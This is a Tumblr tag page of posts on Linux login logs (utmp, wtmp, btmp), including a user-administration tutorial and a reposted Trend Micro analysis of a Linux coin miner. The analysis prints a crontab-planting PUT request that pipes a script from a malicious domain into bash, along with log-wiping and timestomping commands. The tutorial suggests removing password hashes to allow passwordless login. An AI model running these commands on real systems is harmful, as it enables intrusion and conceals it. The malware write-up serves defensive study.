#Linux Log wtmp
Explore tagged Tumblr posts
Visit Tumblr Blog
Explore Tumblr blogs with no restrictions, modern design and the best experience.
Last Seen Tumblr Blogs
Fun Fact
Mobile Tumblr US users spend an average of 4.04 minutes per session on the app.
Text
Linux Log utmp, wtmp ve btmp Dosyaları
Merhaba Değerli Okuyucular, bugün sizler ile Linux Log utmp, wtmp ve btmp Dosyaları: Kullanıcı Oturumları ve Güvenlik İzleme konusuna değinmeye çalışacağız. Linux log dosyaları, işletim sistemi ve uygulamalar tarafından oluşturulan kayıtları içeren dosyalardır. Bu log dosyaları, sistem durumu, hatalar, kullanıcı etkinlikleri ve diğer önemli olayları izleme amacıyla kullanılır. Linux…
View On WordPress
0 notes
Link
0 notes
Text
Difference between /var/log/wtmp and /var/run/utmp in linux ?
1. It contains logins and logout information and it cant be viewed as a text file because they are encrypted ones (i.e Available in binary formats) .
2. /var/run/utmp - Currently logged in details .
3. /var/log/wtmp - Shares both the login and logout information of the logged users .
1 note
·
View note
Link
wtmp file keeps records all logins & logouts on Linux. We also have utmp file that keeps and allows us to discover information about who is currently using the Unix box. But, we cannot read these files directly. See how to view logged in uses
6 notes
·
View notes
Text
#linux#linuxfan#linuxuser#systemadministrator#ubuntu#debian#dev#devops#webdevelopment#webdeveloper#programmer#programming#programmingmemes#linuxmemes#memes#cat#coding#developer#tech#ethicalhacking#computerscience#coder#security#infosec#cyber
0 notes
Text
Linux User Administration Part-2
Linux User Administration Part-2
User Management
Allow user login without password
For passwordless login, we need to delete the password from the /etc/shadow (encrypted password)
vim /etc/shadow
after this file open delete the password for a user to allow login without password and save the file
See the below picture where encrypted password marked in red color we delete that and save the file
linux-user-administration-login-without-password
Do not allow all user to login
For this, we have to create one file let's see
cat > /etc/nologin
Type Here Message For The User To Know Why He Is Not Able To log in
See The Below Example
Allow-user-not-to-login
Here we have created the nologin file and update the message to the user
NOTE:- After the activity kindly delete this file accordingly or as per requirement.
Information about USER
finger is the command to check user information
See the below example for same
finger -l username
information-about-user
How to monitor USER We can monitor USER activity with below commands
w It shows who is logged on and what they are doing.
who show who is logged on
lastlog check the most recent login of all users
lastb shows all failed login attempts We can monitor USER activity with below files /var/run/utmp Have the track of current login state for all user
/var/log/wtmp Have all login and logouts details
/var/log/btmp keeps failed login attempts
Password Aging
We can change the policy using file /etc/login.defs but this is not recommended so we can use chage command for same chage to modify password policy for the users
chage -l username
we will get below output
password-aging
Here we can see the many options
-M this option using we can change the maximum number of days between password change
example chage -M 15 username (using this command) 6th field from above figure will change
-W this option using we can manage the number of days of warning before password expires
example chage -W 9 username (using this command) 7th field from the above figure will change
-E this option using we can manage account expires period
example chage -E 2019/02/08 username (using this command) 4th field from the above figure will change
-I this option using we can manage password expires period
example chage -I 18 username (using this command) 2nd field from above figure will change
change the owner and group of file
Command
chown test.root file1
see the below image for reference
change-ownership-of-file
Group Management
Please remember
User can be a member of more than one group
More than 1 user can be the group administrator if required
The administrator of the group performs
add/change/delete password of the group
delete or add the user to that group
group can be reserved to those members only
Commands
add new group
groupadd groupname
check the group
grep groupname /etc/group
change the gid of the group
groupadd -g 701 groupname
check the group info
grep groupname /etc/group
change the name of the group
groupmod -g 707 -n newname oldname
Here groupmod command using option -g for changing gid and -n option for changing group name from oldname to newname, we can check this in grep newname /etc/group
delete group groupdel groupname assign password to the group gpasswd groupname check group password grep groupname /etc/group /etc/shadow allign group admin to particular group who manage group activities gpasswd -A nameoftheuser groupname here nameoftheuser is admin for group groupname (you can give the name) Adding user to group
gpasswd -a test sales ( Here we have added user test into sales group )
Restrict Other users to login to the group ( -R option )
gpasswd -R sales ( Here we have use option -R to restrict member login to the group sales )
And if want allow then we use -r option
gpasswd -r sales ( allow group member only to login to the group )
Deleting user from the particular group (we can use -d option)
gpasswd -d test sales (Here we have removed user test from group sales)
Combine /etc/group and /etc/gshadow file
grpconv
Now Check
ls /etc/group /etc/gshadow
We can found the output
/etc/group /etc/gshadow
grpunconv
Now Check
ls /etc/group /etc/gshadow
We can found the output
ls: can not access /etc/ghsadow: No such file or directory
/etc/group
grpconv
Now Check again
ls /etc/group /etc/gshadow
We can found the output for both
/etc/group /etc/gshadow
via Blogger https://ift.tt/2X1Ve8L
0 notes
Text
Keeping track of Linux users: When do they log in and for how long?
Keeping track of Linux users: When do they log in and for how long?
[ad_1]
The Linux command line provides some excellent tools for determining how frequently users log in and how much time they spend on a system. Pulling information from the /var/log/wtmp file that maintains details on user logins can be time-consuming, but with a couple easy commands, you can extract a lot of useful information on user logins.
One of the commands that helps with this is the
View On WordPress
0 notes
Text
GNU/Linux 指令 - last
GNU/Linux 指令 – last
心得:
用來查詢關機或重開機的重要訊息,可先充份瞭解時間的發生點後
再透過其他 Log 去更深入的知道發生原因或問題
而大部份是透過 /var/log/messages 尋找原因所在
參數:
-f file 指令輸出的紀錄檔案,而非/var/log/wtmp
-num 顯示行的數量。
-n num 顯示行的數量。
-t YYYYMMDDHHMMSS 顯示特定時間的訊息
-R 不顯示登入的訊息
-a 將登入的主機名稱移至最後行顯示
-d 針對非主機的登入資訊,將 IP 轉成主機名稱顯示
-F 顯示完整的日期與時間
-i 類似於 -d 的功能,但 IP “xxx.xxx.xxx.xxx” 格式呈現
-w 顯示完整的用戶與主機名稱
-x 顯示 run level 與系統關閉的狀態
例子:
查詢最近五項的訊息
# last -n5
查詢重開機的相關訊息
# last reboot
查詢關機的相關…
View On WordPress
0 notes
Text
Original Post from Trend Micro Author: Trend Micro
By Augusto Remillano II and Jakub Urbanec
While conducting a routine log check, we noticed an interesting script from one of our honeypots downloading a binary connected to a domain. Upon further analysis, we found the script capable of deleting a number of known Linux malware, coin miners, and connections to other miner services and ports, and we observed some parts of the script to be reminiscent of Xbash features and KORKERDS. It installs a cryptocurrency-mining malware as well as implant itself into the system and crontabs to survive reboots and deletions.
Figure 1. Script downloading from domain, logged from one of our honeypots.
Routine
Noticing the script downloading the binary, we also looked at an analyzed code of KORKERDS modified and collected in November 2018 and found them almost the same except for a few additions and notable omissions. Compared to KORKERDS, the new script does not uninstall security products found in the system and does not install a rootkit. Instead, the KORKERDS miner and the rootkit component are included in the kill list. Basically, the new script deletes the components and mining process of the malware whose code it copied.
Figure 2. Script was copied from KORKERDS but the process “kworkerds” is killed in the new code.
Figure 3. The rootkit component of KORKERDS is removed in the new version.
The script downloads a binary of a modified version of the cryptocurrency miner XMR-Stak (detected by Trend Micro as Coinminer.Linux.MALXMR.UWEIU), a universal Stratum pool miner that supports CPUs, AMD, and NVIDIA GPUs for Cryptonight currencies. We analyzed the infection and found it to have started from some IP cameras and web services via TCP port 8161, where the attacker tries to upload a crontab file:
PUT /fileserver/vMROB4ZhfLTljleL HTTP/1.1 Host: xxx.xxx.127.221:8161 Accept: */* Content-Length: 105 Content-Type: application/x-www-form-urlencoded*/10 * * * * root (curl -fsSL hxxp://yxarsh.shop/1.jpg||wget -q -O- hxxp://yxarsh.shop/1.jpg)|bash -sh ##
The crontab then downloads and runs shell script 1.jpg, enabling three functions named and identified by the attackers:
Function B kills previously installed malware, coin miners, and all related services referenced to an accompanying malware (detected by Trend Micro as SH.MALXMR.UWEIU). It also creates new directories, files, and stop processes with connections to identified IP addresses.
Figure 4. Coin miner script kills previously installed malware, coin miners, and related services.
Function D downloads the coin miner binary from hxxp://yxarsh.shop/64 and runs it.
Function C downloads a script from hxxp://yxarsh.shop/0, saves it to /usr/local/bin/dns file, and creates a new crontab to call this script at 1 a.m. It also downloads hxxp://yxarsh.shop/1.jpg and puts it in different crontabs:
/etc/cron.d/root /var/spool/cron/root /etc/cron.d/apache /var/spool/cron/crontabs/root /etc/cron.hourly/oanacroner /etc/cron.daily/oanacroner /etc/cron.monthly/oanacroner
The new files have time modifications and last accessed time as /bin/sh file
touch -acmr /bin/sh /etc/cron.hourly/oanacroner
and implant themselves in the system to survive reboots and deletions, trimming the log files to 0:
echo 0>/var/spool/mail/root echo 0>/var/log/wtmp echo 0>/var/log/secure echo 0>/var/log/cron
Compared to the KORKERDS sample, the new script simplifies the routine to downloading and executing the files, followed by installing the coin miner into the system. Looking into its propagation routine, a majority of the codes were also taken from the KORKERDS script, as the codes are still available online with Base64 encoding via hxxps://pastebin.com/u/SYSTEAM. We noted the subtle difference in the absence of the link placed in between the PUT URL /fileserver/vMROB4ZhfLTljleL and the actual crontab. While KORKERDS’ saves the crontab directly, the new script inserts just one crontab that fetches all the code and the miner.
Figure 5. The script was copied from KORKERDS’ Python script for propagation.
Conclusion
While a malware routine that includes the removal of other malware in the system is not new, we’ve never seen the removal of Linux malware from the system on this scale. Removing competing malware is just one way cybercriminals are maximizing their profit. Enterprises can protect themselves from various kinds of evolving attacks by making sure their systems have downloaded the latest patches released by legitimate vendors. Cryptocurrency-mining malware or coin miners use CPU and GPU resources, making systems run slowly. Having a multilayered protection system in place helps IT administrators immediately detect, prevent, and resolve malware infections such as coin miners and stops them from affecting the network and hindering regular enterprise operations.
Trend Micro Solutions
Trend Micro XGen security
Indicators of Compromise
SHA256 Detection 2f7ff54b631dd0af3a3d44f9f916dbde5b30cdbd2ad2a5a049bc8f2d38ae2ab6 Trojan.SH.MALXMR.UWEIU
d9390bbbc6e399a388ac6ed601db4406eeb708f3893a40f88346ee002398955c
Coinminer.Linux.MALXMR.UWEIU
URLs
drnfbu.xyz:26750
hxxp://yxarsh.shop
hxxp://yxarsh.shop/0
hxxp://yxarsh.shop/1.jpg
hxxp://yxarsh.shop/64
hxxp://yxarsh.shop/86
hxxps://pastebin.com/u/SYSTEAM
Directories
/opt/yilu/work/xig
/opt/yilu/work/xige
/usr/bin/bsd-port
Files (with immutable flag):
/opt/yilu/mservice
/opt/yilu/work/xig/xig
/opt/yilu/work/xige/xige
/tmp/thisxxs
/usr/bin/.sshd
/usr/bin/bsd-port/getty
/usr/local/bin/dns
/etc/cron.hourly/oanacroner
/etc/cron.daily/oanacroner
/etc/cron.monthly/oanacroner
Erased (trimmed to zero):
/var/spool/mail/root
/var/log/wtmp
/var/log/secure
/var/log/cron
The post Linux Coin Miner Copied Scripts From KORKERDS, Removes All Other Malware and Miners appeared first on .
Go to Source Author: Trend Micro Linux Coin Miner Copied Scripts From KORKERDS, Removes All Other Malware and Miners Original Post from Trend Micro Author: Trend Micro By Augusto Remillano II and Jakub Urbanec While conducting a routine log check, we noticed an interesting script from one of our honeypots downloading a binary connected to a domain.
0 notes
Text
Reviewing Logins on Linux
The last command provides an easy way to review recent logins on a Linux system. It also has some useful options –- such as looking for logins for one particular user or looking for logins in an older wtmp file.
The last command with no arguments will easily show you all recent logins. It pulls the information from the current wtmp (/var/log/wtmp) file and shows the logins in reverse sequential order (newest first).
from martinos https://www.linux.com/news/reviewing-logins-linux
0 notes
Text
poweroff - Linux Command
poweroff
poweroff [options]
System administration command. Close out filesystems, shut down the system, and power off. Because this command immediately stops all processes, it should be run only in single-user mode. If the system is not in runlevel 0 or 6, poweroff calls shutdown -h, then performs a poweroff.
Options
-d Suppress writing to /var/log/wtmp. -f Call reboot or halt and not shutdown, even when shutdown would normally be called. This option is used to force a hard halt or reboot. -h Place hard drives in standby mode before halt or poweroff. -i Shut down network interfaces before reboot. -n Suppress normal call to sync. -w Suppress normal execution; simply write to /var/log/wtmp.
from Java Tutorials Corner http://ift.tt/2iXnsR7 via IFTTT
0 notes
Text
IDG Contributor Network: Profiling your users
User profiles aren't restricted to what shells your users use, what groups they are members of, and what privileges they have been allocated. While these factors are important, so are when they log in, how much disk space they are using, and what they're actually doing on your systems. Periodic reviews of your users can help you get a better feel for how they use your systems and can sometimes help you to pinpoint problems.
Unix provides a lot of commands that can help pull together a quick picture of how your users are set up and when they are active.
Recent logins
The last command will show you recent logins for any particular user or for everyone. Depending on when the source file for this information (your wtmp file) rolls over, this might represent months of user logins.
To read this article in full or to leave a comment, please click here
from Computerworld http://www.computerworld.com/article/3154741/linux/profiling-your-users.html#tk.rss_all
0 notes